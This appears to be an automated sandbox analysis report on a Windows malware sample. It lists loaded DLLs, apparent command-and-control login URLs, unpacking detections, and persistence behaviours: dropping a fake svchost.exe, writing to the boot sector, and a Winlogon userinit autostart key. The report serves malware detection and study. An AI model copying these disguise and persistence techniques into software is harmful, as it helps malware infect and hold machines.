    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: winscard.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: devobj.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sensapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dbghelp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netapi32.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: samcli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: netutils.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: dnsapi.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wininet.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: windows.storage.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: wldp.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: sspicli.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: iertutil.dll
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeSection loaded: profapi.dll
    Source: C:\Users\user\Desktop\arxtPs1STE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
    Source: arxtPs1STE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: com.lysyvaxhttp://vocyzit.com/login.phpndows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ?\\??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000003.2567119423.000000000B471000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: com.lyxyjodhttp://qetyfuv.com/login.phpndows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Program Files (x86)\Windows Defender\wntdll.pdb\* source: svchost.exe, 00000002.00000002.2667307547.000000000757B000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.2659791356.0000000003D71000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.2658440872.0000000003AB7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000002.00000002.2658440872.0000000003ABD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernelbase.pdb( source: svchost.exe, 00000002.00000002.2658440872.0000000003ABD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tGYLgZxMWmmBTD.exe, 00000005.00000002.1826646518.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000006.00000000.1751652586.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000009.00000002.1852846193.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000000D.00000000.1771895214.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000011.00000000.1782019085.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000014.00000000.1788796306.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000016.00000002.1811967690.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000018.00000000.1809196113.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001A.00000000.1825252070.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001D.00000002.1875987559.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 0000001F.00000000.1845068573.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000022.00000002.1917724112.000000000019E000.00000002.00000001.01000000.0000000A.sdmp, tGYLgZxMWmmBTD.exe, 00000027.00000002.1905806801.000000000019E000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000003.2569536578.00000000029C9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: l\winsta.pdb source: svchost.exe, 00000002.00000003.2567119423.000000000B471000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2675415651.000000000B472000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wkernel32.pdb( source: svchost.exe, 00000002.00000002.2658440872.0000000003AB7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000003.2569536578.00000000029C9000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: http://vonypom.com/login.phpndows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.2658367884.0000000003A60000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WinSCard.pdb source: svchost.exe, 00000002.00000002.2658971503.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: winsta.pdb( source: svchost.exe, 00000002.00000002.2659791356.0000000003D71000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb source: svchost.exe, 00000002.00000002.2675415651.000000000B472000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.2658971503.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: kDJwntdll.pdb source: svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\arxtPs1STE.exeUnpacked PE file: 0.2.arxtPs1STE.exe.400000.2.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.1.unpack .text:ER;.D:W;.SC:W;.Wp:R;.aS:W;.vtzr:R;.fvH:R;.data:W;.Lx:W;.sOZF:W;.h:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
    Detected unpacking (creates a PE file in dynamic memory)
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeUnpacked PE file: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\arxtPs1STE.exeUnpacked PE file: 0.2.arxtPs1STE.exe.400000.2.unpack
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 2.2.svchost.exe.400000.1.unpack
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: svchost.exe.0.drStatic PE information: real checksum: 0xbc875f1 should be: 0x3615e
    Source: arxtPs1STE.exeStatic PE information: real checksum: 0x59c9818d should be: 0x3615e
    Source: arxtPs1STE.exeStatic PE information: section name: .D
    Source: arxtPs1STE.exeStatic PE information: section name: .SC
    Source: arxtPs1STE.exeStatic PE information: section name: .Wp
    Source: arxtPs1STE.exeStatic PE information: section name: .aS
    Source: arxtPs1STE.exeStatic PE information: section name: .vtzr
    Source: arxtPs1STE.exeStatic PE information: section name: .fvH
    Source: arxtPs1STE.exeStatic PE information: section name: .Lx
    Source: arxtPs1STE.exeStatic PE information: section name: .sOZF
    Source: arxtPs1STE.exeStatic PE information: section name: .h
    Source: svchost.exe.0.drStatic PE information: section name: .D
    Source: svchost.exe.0.drStatic PE information: section name: .SC
    Source: svchost.exe.0.drStatic PE information: section name: .Wp
    Source: svchost.exe.0.drStatic PE information: section name: .aS
    Source: svchost.exe.0.drStatic PE information: section name: .vtzr
    Source: svchost.exe.0.drStatic PE information: section name: .fvH
    Source: svchost.exe.0.drStatic PE information: section name: .Lx
    Source: svchost.exe.0.drStatic PE information: section name: .sOZF
    Source: svchost.exe.0.drStatic PE information: section name: .h
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B895 push cs; retf 0004h0_2_0044B8F5
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044E89D push es; iretd 0_2_0044E8AC
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B1E0 push eax; ret 0_2_0044B20E
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B55E pushad ; ret 0_2_0044B569
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B56A push eax; ret 0_2_0044B56D
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044B576 push ss; ret 0_2_0044B579
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044EF69 push cs; iretd 0_2_0044EF78
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_0044EF33 push cs; ret 0_2_0044EF48
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_020E065B push ebx; ret 0_2_020E0677
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_020E0678 push dword ptr [esp+48h]; ret 0_2_020E0747
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B895 push cs; retf 0004h2_2_0044B8F5
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E89D push es; iretd 2_2_0044E8AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B1E0 push eax; ret 2_2_0044B20E
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B55E pushad ; ret 2_2_0044B569
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B56A push eax; ret 2_2_0044B56D
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044B576 push ss; ret 2_2_0044B579
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF69 push cs; iretd 2_2_0044EF78
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044EF33 push cs; ret 2_2_0044EF48
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B33 push cs; ret 2_2_02BF8B48
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF8B69 push cs; iretd 2_2_02BF8B78
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF849D push es; iretd 2_2_02BF84AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF4DE0 push eax; ret 2_2_02BF4E0E
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E0678 push dword ptr [esp+48h]; ret 2_2_023E0747
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_023E065B push ebx; ret 2_2_023E0677
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46895 push cs; retf 0004h2_2_02A468F5
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4989D push es; iretd 2_2_02A498AC
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A368D2 push ebp; retf 2_2_02A368D3
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A461E0 push eax; ret 2_2_02A4620E
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3664C push ebp; retf 2_2_02A3664D
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A4656A push eax; ret 2_2_02A4656D
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A46576 push ss; ret 2_2_02A46579

    Persistence and Installation Behavior

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02BC33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_008E33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_008933F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u9_2_02BE33F0
    Drops PE files with benign system names
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Users\user\Desktop\arxtPs1STE.exeExecutable created and started: C:\Windows\apppatch\svchost.exeJump to behavior
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: API: WriteFile string: \\?\globalroot\systemroot\system32\tasks\0_2_00403560
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file
    Source: C:\Users\user\Desktop\arxtPs1STE.exeFile created: C:\Windows\apppatch\svchost.exeJump to dropped file

    Boot Survival

    barindex
    Contains functionality to infect the boot sector
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,lstrcpynA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u2_2_02BC33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u5_2_008E33F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u6_2_008933F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: memset,GetDriveTypeA,SetCurrentDirectoryA,_snprintf,CreateFileA,SetFilePointer,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, \\.\PhysicalDrive%u9_2_02BE33F0
    Creates an undocumented autostart registry key
    Source: C:\Windows\apppatch\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon userinitJump to behavior
    Monitors registry run keys for changes
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
